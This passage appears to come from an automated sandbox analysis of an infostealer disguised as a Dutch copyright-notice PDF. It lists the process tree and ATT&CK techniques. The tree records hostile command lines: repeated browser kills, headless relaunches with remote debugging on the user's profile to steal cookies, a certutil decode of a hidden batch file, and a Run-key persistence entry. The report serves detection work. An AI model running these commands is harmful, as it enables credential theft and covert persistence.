    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1492,i,16976724941683533984,12372658618961509311,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1484 /prefetch:2
        5⤵
        
        PID:4504
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1768,i,16976724941683533984,12372658618961509311,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1764 /prefetch:3
        5⤵
        
        PID:5588
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3048
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:3412
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x1fc,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:5696
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1520,i,14696466757263850356,8200626449733009637,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1512 /prefetch:2
        5⤵
        
        PID:5148
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1676,i,14696466757263850356,8200626449733009637,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1664 /prefetch:3
        5⤵
        
        PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5008
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:1136
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x1bc,0x1c0,0x22c,0x204,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:3304
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1492,i,17798396597745674567,4795362395126457541,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1480 /prefetch:2
        5⤵
        
        PID:3708
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1792,i,17798396597745674567,4795362395126457541,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1788 /prefetch:3
        5⤵
        
        PID:3236
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:1940
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:1844
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x228,0x22c,0x230,0x200,0x238,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:1420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1520,i,5425392465951395875,1730525958358899721,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1512 /prefetch:2
        5⤵
        
        PID:1728
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1784,i,5425392465951395875,1730525958358899721,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:3
        5⤵
        
        PID:5500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5676
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:1108
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:1820
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1496,i,16967865200347936781,10774238603905240441,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1472 /prefetch:2
        5⤵
        
        PID:1716
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1772,i,16967865200347936781,10774238603905240441,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1768 /prefetch:3
        5⤵
        
        PID:1504
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:1860
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:5860
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1504,i,10811116562244010317,778303183741202722,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1496 /prefetch:2
        5⤵
        
        PID:1072
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1772,i,10811116562244010317,778303183741202722,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1768 /prefetch:3
        5⤵
        
        PID:4120
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:4924
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:3004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1504,i,16172748253386409195,13063615419846657233,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1496 /prefetch:2
        5⤵
        
        PID:1636
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1768,i,16172748253386409195,13063615419846657233,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1764 /prefetch:3
        5⤵
        
        PID:2452
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5260
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:5072
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:4160
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1508,i,151293027064439410,14936705601246310253,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1500 /prefetch:2
        5⤵
        
        PID:2392
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1776,i,151293027064439410,14936705601246310253,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1772 /prefetch:3
        5⤵
        
        PID:5716
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:1020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffc479946f8,0x7ffc47994708,0x7ffc47994718
        5⤵
        
        PID:560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1460,11640935109424650560,15228631031837336406,131072 --disable-features=PaintHolding --no-sandbox --headless --log-level=3 --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --log-level=3 --mojo-platform-channel-handle=1496 /prefetch:2
        5⤵
        Modifies registry class
        
        PID:5416
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1460,11640935109424650560,15228631031837336406,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-gl=swiftshader-webgl --headless --log-level=3 --mojo-platform-channel-handle=1680 /prefetch:3
        5⤵
        
        PID:1136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --log-level=3 --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1460,11640935109424650560,15228631031837336406,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1832 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:972
- - C:\Windows\SysWOW64\certutil.exe
    certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
    3⤵
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:4676
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1540
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.pdf
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:2996
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffc465a46f8,0x7ffc465a4708,0x7ffc465a4718
      4⤵
      PID:4492
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
      4⤵
      PID:5508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
      4⤵
      PID:4396
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
      4⤵
      PID:5668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      PID:4132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
      4⤵
      PID:404
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
      4⤵
      PID:4228
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5356 /prefetch:6
      4⤵
      PID:3624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
      4⤵
      PID:5728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12124519070180365390,9489185671634577412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
      4⤵
      PID:3616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:64

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Modify Authentication Process

T1556

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
